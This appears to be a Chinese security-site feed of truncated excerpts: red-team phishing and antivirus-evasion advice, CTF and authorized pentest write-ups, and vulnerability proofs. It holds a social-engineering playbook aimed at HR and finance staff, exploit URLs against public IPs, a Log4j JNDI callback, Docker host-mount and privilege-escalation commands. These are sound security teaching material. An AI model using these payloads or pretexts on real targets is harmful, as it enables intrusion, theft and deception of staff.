红队攻击面相关讨论

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼…

一、环境安装 1.kali下安装Volatility2 注意：一般Volatility2比Volatility3好用 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py python2 get-pip.py python2 -m pip install Crypto python2 -m pip install pycryptodome python2 -m pip install pytz python2 -m pip install Pillow #PIL图形处理库 apt-get install pcregrep python2-dev #插件安装依赖库 python2 -m pip install distorm3 #反编译库 python2 -m pip install openpyxl #读写excel文件 python2 -m pip install ujson #JSON解析 python2 -m pip uninstall yara #恶意软件分类工具 python2 -m pip install pycrypto #加密工具集 python2 -m pip install construct #mimikatz依赖库 # 在 https://github.com/virustotal/yara/releases 下载 YARA 压缩包 tar -zxf yara-4.4.0.tar.gz…

0# 什么是AWD 0.1# AWD赛制介绍 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一，该模式常见于线下赛。 在该模式中，每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox )，该环境通常运行着一些特定的服务或应用程序，而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞，获取 Flag 以获得积分; 同时，参赛队伍也需要修补自身服务漏洞进行防御，以防被其他队伍攻击和获取 Flag。 主要特点为：强调实战性、实时性、对抗性，综合考量竞赛队的渗透能力和防护能力。 0.2# 比赛整体流程 赛前准备环节：我们会分配到多个靶机服务器，通常是分配给我们 SSH 或者 VNC 的用户名和密码，还有相关IP等信息 安全加固环节：我们需要先自己去登录靶机服务器，进行30分钟的安全加固（源码备份/弱口令修改/代码审计和修复/漏洞修复等） 自由攻击环节：安全加固时间过后，开始自由攻击环节，通过对别的队伍的靶机服务器进行攻击（弱口令/Web漏洞/系统漏洞等）获得Flag进行加分，对应队伍失分 1# 比赛环境 通常比赛环境有以下三种情况： 混合靶机情况：运维机器 Windows 10 + 攻击机 Kali Linux + Win靶机 Windows Server 2003/2008/2012 或者 Windows 7 + Linux靶机 Centos7.x 或者 Ubuntu 16.04/17.…

前言由客户授权的一次攻防演练，从外网钓鱼到内网遨游，也算是幸不辱命，攻击路径绘制了流程图，接下来会按照我画的攻击流程图来进行讲解，流程图如下： 外网钓鱼首先外网收集相关信息，添加微信，构造与客服业务相对 应的话术，诱导对方点击木马，过程如下图： 客服成功上线如下图： 然后对该企业的总监同样实施微信钓鱼，构造的话术为商务合作，诱导对方点击木马如下： 同样上线： 内网遨游登陆相关系统翻阅客服终端，发现密码本，成功登陆邮箱系统，发现大量内部办公邮件如下： 通过密码本登陆运营平台，发现2000w+记录如下： 同时还发现该运营系统存在SQL注入如下： 使用sqlmap获取数据库用户密码如下： 通过密码本登陆Zabbix系统如下： 发现某源码，开审！翻阅另一台终端文件时，发现了一个压缩包为install.zip,解压查看，发现为某系统源码： 语言为PHP如下: 审计源码发现该系统后台插件添加处存在任意文件上传漏洞，通过添加插件的方式对向服务器中写入webshell获取到多台服务器权限。 重点在Build()函数里 直接把请求的config数据写入到插件目录下的config.php文件中了，如下： burp构造数据包发包： 解析成功，getshell如下： 通过此0day拿下多台服务器权限如下： 掌控云上资产通过前面控制的机器，在其中一台机器中，翻阅配置文件，找到数据库账号密码，登陆数据库在其中一个表中发现了AK/SK如下： 可以接管阿里云所有系统： 拿下gitlab通过linux历史记录获取到gitlab后台权…

0x00 前言刚结束某地HVV，小程序作为低成本易用的信息化系统，成为HVV新型重点突破对象。以下案例均来自于小程序，供大家学习。 0x01 案例一 某政务系统1.弱口令进入后台点击小程序，进入公民办事，抓到小程序域名，访问直接是管理员后台，如下页面即为Fastadmin框架 。 一直有个坑，登录一直显示口令无效，在我要放弃的时候，点击返回上一步提醒我，您已登录，我纳闷了，发现该系统登陆操作后token会刷新，导致下一次登录必须使用上一次token，否则口令无效。因此应该是网络或系统本身有延时，导致未成功使用正确token进行登陆操作，当发现这个问题的时候我已经admin/123456登进了后台。 内包含数据近20000条公民信息，以及管理员账户几百个，且所有管理员账户中的账户名密码均为admin/123456。与地级市HVV | 未授权访问合集中的案例四系统情况类似。（码死） 2.到处都是SQL注入前台业务处如下包，debug没有关导致爆出来数据库账户名密码，这个SQL注入太明显了，但此时我处在数据库账密的喜悦中没有搞SQL注入，可是这个数据库不对外，只能本地连接，烦死了。 后台查看管理员的时候存在延时注入 3.命令执行拿下服务器和数据库既然是fastadmin，那有很多拿shell的方法，这次是用在线命令插件漏洞写入PHP Webshell，该漏洞只在1.1.0可用。 但是这个系统是二开的，根本找不到插件的地方，在网上搜罗了一下拼接找到插件页面。 目录为：/addon?ref=addtabs 那该插件的目录就应该是/ad…

一、MISC 1.sudoku_easy 简单的数独交互，几个小注意点，每次发送level之后sleep5秒才会返回题目 将形如 --------------------- 800103720 023840650 410006008 300001062 000052407 072060090 160000375 205019846 000030000 --------------------- 转换成二维数组进行解数独，并将返回结果重新转换成多行字符串形式 def parse_input(input_list): board = [] for row in input_list: nums = list(map(int, row)) board.append(nums) return board def format_output(board): formatted = "" for row in board: formatted += "".join(map(str, row)) + "\n" return formatted.strip() 一开始以为每次获得5分，要拿到120分，range了24次，一直出问题，后来发现获得分数是递增的，同时调试了一下发现拿到120分会返回一个getshell，因此修改一下range7次 最终脚本: def find_e…

Re Emoji Connect 是Excel的插件，开始玩之后会初始化一个4848的矩阵，每个格子里有一个emoji，然后每次点击两个格子，如果两个格子里的emoji相同，就会消除这两个格子。一开始以为是消星星一类的三个格子的消除，但看game的逻辑每次只替换两个，所以确实是连连看。然后flag的逻辑就是每次消除的时候减去格子的 行列，下标是用神奇的方法从unicode转过去的，我这里直接用矩阵里emoji的最小值做下标偏移了 dat = '''😈 😑 😔 😎 😌 😆 😤 😮 😮 😟 😪 😂 😢 😐 😩 😙 😭 😎 😬 😅 😉 😦 😛 😥 😜 😤 😑 😨 😝 😗 😛 😁 😑 😏 😜 😠 😤 😋 😀 😁 😅 😖 😑 😡 😒 😇 😄 😛 😊 😈 😂 😘 😬 😩 😥 😬 😈 😫 😅 😊 😒 😦 😑 😅 😙 😔 😟 😩 😬 😐 😑 😮 😔 😥 😧 😖 😇 😦 😉 😈 😘 😯 😣 😉 😓 😞 😃 😌 😨 😖 😮 😙 😙 😫 😋 😣 😜 😉 😇 😮 😝 😞 😒 😪 😂 😬 😯 😃 😄 😘 😪 😛 😤 😑 😦 😯 😗 😋 😡 😤 😊 😨 😉 😬 😍 😏 😨 😔 😝 😀 😡 😝 😅 😧 😋 😔 😨 😗 😍 😨 😝 😈 😫 😤 😍 😍 😌 😅 😫 😏 😫 😗 …

Kerberos认证流程前言本文主要分享最近学习的关于域内Kerberos认证的一些攻击手法，以自我的理解为主，从原理理解切入到基本工具利用来阐述，个人的理解分析较为啰嗦，嫌太兀长的可以跳着看就好，还请各位谅解。如有错误，请师傅们提出更正 对于Kerberos认证流程只是简单的描述带过，下面有很多细节没有说明，比如PAC，S4U2SELF(委派)，S4U2PROXY(委派)等。详细的解读推荐翻阅daiker师傅写的相关文章 本文主要环境利用的是红日靶场VulnStack 域控 owa win2008R2 192.168.52.138域主机 sut1 win7 192.168.52.130域外主机 k0uaz win7(可访问到域控) 192.168.52.162主要涉及主体和角色Domain Controller 域控制器，简称DC，一台计算机，实现用户、计算机的统一管理Key Distribution Center 秘钥分发中心，简称KDC，默认安装在域控里，包括AS和TGSAuthentication Service 身份验证服务，简称AS，用于KDC对Client认证Ticket Grantng Service 票据授予服务，简称TGS，用于KDC向Client和Server分发Session Key(临时秘钥)Active Directory 活动目录，简称AD，用于存储用户、用户组、域相关的信息。Client 客户端，指用户。Server 服务端，可能是某台计算机账户，也可能是某个服务。过程和原理 上图中涉及到了三个请求返回过程…

0x00 kkFileview存在任意文件读取漏洞 漏洞描述 Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。 漏洞影响 kkFileview <=3.6.0 fofa查询 body="kkFile：View" 漏洞证明 http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd 0x01 kkFileView SSR 漏洞 漏洞描述 kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造（SSRF），远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn 0x03 kkFileView XSS漏洞 漏洞描述 kkFileview v4.1.0存两处XSS漏洞，可能导致网站cookies泄露。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://www.baidu.com/test.txt">…

日常流程简要说明入口权限 => 内网搜集/探测 => 免杀提权[非必须] => 抓取登录凭证 => 跨平台横向 => 入口维持 => 数据回传 => 定期权限维护 0x01 入口权限获取 [ 前期侦察，搜集阶段本身就不存在太多可防御的点，非防御重心 ]1.绕CDN找出目标所有真实ip段(1).通过全国多个PING，查看IP地址是否唯一来判断是否存在CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2).通过之前的DNS绑定历史记录来查找真实IP地址https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3).通过获取多个子域名，并批量对多个子域名进行ping，可判断该子域名的IP段就是真实IP段（主站用了CND，而子域名分站不用Cdn解析）Layer子域名挖掘机/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(…

前言前段时间参加了一场攻防演练，使用常规漏洞尝试未果后，想到不少师傅分享过从JS中寻找突破的文章，于是硬着头皮刚起了JS，最终打开了内网入口获取了靶标权限和个人信息。在此分享一下过程。 声明：本次演练中，所有测试设备均由主办方提供，所有流量均有留档可审计，所有操作均在授权下完成，所有数据在结束后均已安全销毁。 通过JS打点开局只有一个登录页面，无法枚举用户名并且尝试爆破未果。 利用bp抓包查看JS相关文件发现存在sql语句 跟踪comboxsql变量，发现定义了一个action类 搜索这个action类路径，发现访问方式是通过url拼接 将该路径进行拼接，并将参数输入sql语句，测试发现该数据库为mssql数据库，可通过xp_cmdshell来执行系统命令。 shellcodeloader上线CS执行system权限后，打算直接使用远程下载上线免杀cs，但是未上线成功，查看进程发现有360企业云，触发拦截了执行exe行为。 换种思路，通过下载哥斯拉webshell后，利用哥斯拉的shellcodeloader功能，加载自己CS木马的shellcode可上线成功。 解密数据库配置信息因执行任何exe文件时，均提示拒绝访问，无法进行文件的运行，通过搜索本机配置文件发现了数据库的账号密码，但是数据库密码加密了 通过查找历史网站备份文件，发现的该系统早期配置文件并未做数据库密码加密配置，测试发现可以连接数据库。 另外查找本系统数据库备份文件时，意外发现了该服务器部署的另一套业务系统，并且数据库配置文件中的账号、密码…

在测试甲方业务或者挖 SRC 等业务的时候，经常碰到发送短信验证的地方，我们可以联想到的就是任意用户登陆、短信轰炸、任意用户修改密码等逻辑性的漏洞， 简单的漏洞也是需要清晰的思维分析，拿几个短信轰炸多个绕过案例分享，高危挖不动低危拿来凑。 1. 参数污染绕过 参数污染，就是说后台发送短信的时候会取数字那部分，当你混入其他字符之后绕过了对已经发送的手机号码的限制的校验：2. 变量污染绕过 所谓变量污染呢， 大概因为后台校验了第一个变量的内容都当成了值处理，但是当数据包在传递到后台过去的时候，如果参数名是一样的时候，是会以第二个、第三个、第四个…最后那个参数为基准去传递，因此绕过了后台的限制 3. 数据长度绕过 手机号码的定义是 11 位数，但是后台没有对传递的手机号码做校验长度，比如123=0123=00123，通过该方法来进行一个手机号码的绕过： 【狗的一个漏洞】【找不到图片了】 4. 修改变量参数绕过 比较常见就是发送验证码的时候前端带入一个状态，通过修改这个状态可以来绕过系统的限制，如已注册的用户不能发送短信或者相反未注册的用户不能发送短信 Flase 改成 true 5. Cookie 替换绕过 换汤不换药，校验用户的凭证放在了 cookie 中，通过修改 cookie 中的某些参数可以打到绕过对以发送/已注册的手机号码进行发送短信： 6. 【空格绕过短信轰炸】【无图】 发送短信的时候是 11 位数，但是数据库没有限制字段长度为 11，通过添加空格绕过了原有的校验，但是后台发送号码的时候，取有效字符前面的字段，导致了出现被绕…

0 简介JumpServer是一款开源的堡垒机，是符合4A规范的运维安全审计系统，通俗来说就是跳板机。 2021年1月15日，JumpServer发布安全更新，修复了一处远程命令执行漏洞。由于JumpServer某些接口未做授权限制，攻击者可构造恶意请求获取敏感信息，或者执行相关操作控制其中所有机器，执行任意命令。 影响版本： JumpServer < v2.6.2JumpServer < v2.5.4JumpServer < v2.4.5JumpServer = v1.5.91. 漏洞分析看修复代码的commit记录：https://github.com/jumpserver/jumpserver/commit/f04e2fa0905a7cd439d7f6118bc810894eed3f3e 发现是给CeleryLogWebsocket类的connect加上了身份认证。 import time import os import threading import json from common.utils import get_logger from .celery.utils import get_celery_task_log_path from .ansible.utils import get_ansible_task_log_path from channels.generic.websocket import JsonWebsocketConsumer logger = get_logger(__na…

0x01. NetLocalGroupGetMembers 功能：查询目标服务器本地管理组的成员 0x02. NetLocalGroupEnum 功能：返回指定服务器上的所有本地组 0x03. NetGroupGetUsers 功能：返回指定服务器指定组的所有成员 查询域里的各个组里的成员，IP必须是域控IP 0x04. NetUserEnum 功能：查询目标服务器所有用户，包括隐藏用户 0x05. wnetaddconnection2a 功能：建立IPC连接，可以将目标共享目录映射到本地磁盘 0x06. WNetCancelConnection2 功能：删除IPC连接 0x07. EnuDomainUser 功能：枚举域用户 1. 介绍 适用于：当前边界机器权限是工作组机器，通过nltest或者nbtscan等工具发现内网有域环境，并且找到域控IP，但是没有域用户的权限下渗透思路。 前提条件：能够和域控建立空连接 实现原理：域管默认都会有administrator用户，通过windows api查出administrator域管的SID，然后遍历SID范围，枚举出域成员（域用户和域机器）。 SID范围：域用户和域机器的SID一般是1000以上，所以使用工具的时候遍历1000以上的SID 2. 工具使用 使用帮助： C:\Users\Administrator\Desktop>EnuDomainUser.exe Usage: EnuDomainU…

Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题，Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞，攻击者可以绕过用户名密码认证，直接登录Nacos用户0x01 漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa：app="NACOS"0x03 漏洞复现在nacos中，token.secret.key值是固定死的，位置在conf下的application.properties中： nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789 1.获取token利用该默认key可进行jwt构造，直接进入后台，构造方法： 在https://jwt.io/中：输入默认key： SecretKey012345678901234567890123456789012345678901234567890123456789 然后再payload里面输入： { "sub": "nacos", "exp": 1678899909 } 在这里注意：1678899909这个值是unix时间戳，换算一下，要比你系统当前的时间更晚，比如当前的时间是2023年03月15日22:11:09，在这里面的时间戳时间是3月16号了： 注意： …

前言Evil-winrm 工具最初是由 Hackplayers 团队开发的。开发该工具的目的是尽可能简化渗透测试，尤其是在 Microsoft Windows 环境中。 Evil-winrm 使用 PowerShell 远程协议 (PSRP)，且系统和网络管理员经常使用Windows Remote Management 协议进行上传和管理。 WinRM 是一种基于对防火墙友好的SOAP 协议，可通过 HTTP默认 端口 5985 与 HTTP 传输一起使用。有关 PowerShell 远程处理的更多信息，请参考访问 Microsoft 的官方网站。 https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3 Evil-winrm介绍Evil-winrm 是一款使用ruby 语言开发的开源工具。 该工具具有许多很酷的功能，包括使用纯文本密码远程登录、SSL 加密登录、 NTLM 哈希登录、密钥登录、文件传输、日志存储等功能。该开发工具的作者不断更新工具并长期维护更新。 使用 evil-winrm，我们可以获得远程主机的 PowerShell命令终端会话。 该工具已在Kali Linux系统中集成，但如果您想单独下载使用，则可以从其官方 git 存储库下载它。 下载链接： https: //github.com/Hackplayers/evil-w…

0x1 Info 靶场地址：https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 从web到内网再到域的靶场环境都全，且出题的思路很好，感兴趣的可以去玩玩 0x2 ReconTarget external IP 39.98.34.149Nmap results 关注80端口的http服务，目录爆破（省略）找到 /admin 使用弱口令登录进入后台，去到模板页面，编辑header.html，添加php一句话 \ 用户名: admin, 密码：123456 命令执行 0x03 入口点：172.22.4.36弹shell 快速过一下： 入口机器没特别的东西没能提权到root权限（也不需要提权到root权限）stapbpf suid利用失败 找到diff suid flag01 diff --line-format=%L /dev/null /home/flag/flag01.txt flag01 里面有提示用户名 WIN19\Adrian挂代理扫 445 获取到三个机器信息 172.22.4.19 fileserver.xiaorang.lab 172.22.4.7 DC01.xiaorang.lab 172.22.4.45 win19.xiaorang.lab 用 Flag01提示的用户名 + rockyou.txt 爆破，爆破出有效凭据 (提示密码过期) win19\Adrian babygirl1xfreerdp 远程登录上 win19 然后改密码 0x04…

0x01 – InfoTag: Tomcat，NTLM，WebClient，Coerce Authentication，noPac 0x02 – ReconTarget external ip 47.92.146.66 Nmap results Focus on port 8009 (ajp) ，意味着是tomcat (对应了靶场的tomcat tag) 目录扫描，404页面显示为tomcat 9.0.30 Playing with Ghost cat 使用该项目测试 https://github.com/00theway/Ghostcat-CNVD-2020-10487 读取/web-inf/web.xml url-pattern 结果存为字典 FFuf 关注uploadservlet 上传temp.txt 返回文件地址 ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt 替换 ./upload to /upload，成功读取到上传的文件 python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt read 0x03 – GhostCat命令执行准备好 shell.txt <% java.io.InputStream in = Runtime.getRuntime().…

0x00 IntroOSCP 渗透风格，脱离C2和MSF之类的工具Box 难度不高 0x01 InfoTag: JDBC, Exchange, NTLM, Coerce Authentication, DCSync 0x02 ReconTarget external IP 39.98.179.149Nmap results 直接关注8000端口，前面我已经怼过80了，没东西直接过 华夏ERP，有很多漏洞的，入口点卡了很久，后面看到JDBC，直接谷歌一搜就搜到大哥的文章了 Fastjson高版本的奇技淫巧 – Bmth (bmth666.cn)(http://www.bmth666.cn/bmth_blog/2022/10/19/Fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/#%E8%93%9D%E5%B8%BD%E6%9D%AF2022%E5%86%B3%E8%B5%9B-%E8%B5%8C%E6%80%AA)构造payload Configure MySQL_Fake_Server 未授权 + MySQL Connector JDBC反序列化组合拳直接RCE RCE后直接获取 Flag01 0x03 入口点：172.22.3.12SMB扫描内网主机，看到Exchange关键字 (EXC01)，尝试访问 172.22.3.9 为 Exchange Proxylogon 直接打死，获取system权限 flag02…

开启靶机后是一个带着 ThinkPHP icon 的登陆界面，直接测试一下 存在 5.0.23 RCE 打一下，PHP-7.4.3 的环境，看一下 disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare 传马上去，蚁剑连接，是www-data权限，那么就得想办法提权进到/root下 在以前关注的公众号下找了些文章，Web安全工具库 这篇写的挺全的，《Linux提权备忘录》 尝试cat /etc/sudoers被告知Permission denied，换成sudo -l查看 这个网站里可以提供命令提权参考 可以使用mysql来实现，sudo mysql -e '! cat /ro…

说明Time是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。 技术Neo4j、Kerberos、Privilege Elevation、域渗透 第一个flag外网IP信息收集start infoscan (icmp) Target '39.98.236.25' is alive icmp alive hosts len is: 1 39.98.236.25:22 open 39.98.236.25:1337 open 39.98.236.25:7474 open 39.98.236.25:7473 open 39.98.236.25:7687 open 39.98.236.25:35555 open alive ports len is: 6 start vulscan 已完成 0/6 [-] webtitle http://39.98.236.25:7473 Get "http://39.98.236.25:7473": net/http: HTTP/1.x transport connection broken: malformed HTTP response "\x15\x03\x03\x00\x02\x02P" [*] WebTitle:http://39.98.236.25:7474 code:200 len:145 title:N…

说明Certify是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。 技术Solr、AD CS、SMB、Kerberos、域渗透 第一个flaglog4j RCE扫描外网IP 发现solr存在log4j的组件，测试是否存在rce GET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1 Host: 47.92.113.194:8983 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://47.92.113.194:8983/solr/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Connection: closednslog回显 JNDI反弹shell，在VPS上开启 # 加载恶意类 java -…

说明Unauthorized是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。 技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透 第一个flagdocker 未授权通过外网信息收集，发现docker未授权 https://cloud.tencent.com/developer/article/1744943 查看镜像 docker -H tcp://47.92.7.138:2375 images查看容器 docker -H tcp://47.92.7.138:2375 ps -a启动容器并将宿主机磁盘挂载到/mnt docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04写入公钥在vps上生成秘钥，敲下回车后会有3个交互，第一个是文件名，默认是id_rsa，如需修改，自己输入一个文件名便可。第二与第三是密码与确认密码，是以后使用该公钥时要输入的密码，一般不设置，如有强烈的安全需求，自己设置便可。最后会生成两个文件id_rsa，id_rsa.pub。以.pub结尾的是公钥，另一个是私钥 ssh-keygen -t rsa将公钥其写入到目标机器宿主机的/root/.ssh/authorized_keys…

说明Brute4Road是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。 技术Redis、Brute Force、SMB、Privilege Elevation、域渗透 第一个flagredis主从复制RCEfscan扫描入口ip，如果下面入口ip有变化是因为重启的环境，流程没有问题 发现了redis的未授权，测试了写计划任务反弹shell，提示没有权限，尝试redis主从复制RCE成功 suid提权用户为redis，需要提权，使用suid提权，可以执行以下命令，具体可以查看 Linux系统suid提权1 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ;base64是具有suid权限的，我们可以通过base64读取本地文件并输出，获取到第一个flag base64 "/home/redis/flag/flag01" | base64 --decode 第二个flagwpcargo未授权RCE在入口ip的服务器上设置代理，并进行内网扫描，通过weget上传 npc和fscan start ping (icmp) Targe…

0x1 InfoTag: MSSQL，Privilege Escalation，Kerberos，域渗透，RDP 靶场地址：https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU0x2 ReconTarget external ip 47.92.82.196nmap MSSQL 弱口令爆破，爆破出有效凭据，权限为服务账户权限（MSSQLSERVER） sa:1qaz!QAZ 0x3 入口点 MSSQL - 172.22.8.18前言，该机器不在域内直接MSSQL shell（这里做完了忘记截图了..） 提权，这里直接获取Clsid暴力怼potato（前面几个clsid是用不了的） 修改GetClsid.ps1，添加执行potato Potato和GetClsid.ps1 执行GetClsid.ps1 获取到有效clsid以及命令执行结果 导出SAM，SYSTEM，Security 解出凭据，用administrator + psexec 139横向（外网没有开445）就能获取到 flag01 administrator 2caf35bb4c5059a3d50599844e2b9b1f qwinsta和端口连接看到有机器rdp过来 这边使用administrator psexec后上msf（system权限），使用incognito模块，模拟至john（本人实测，只有msf的incognito能完成后续操作，f-secure lab等其他的模拟令牌工具没成…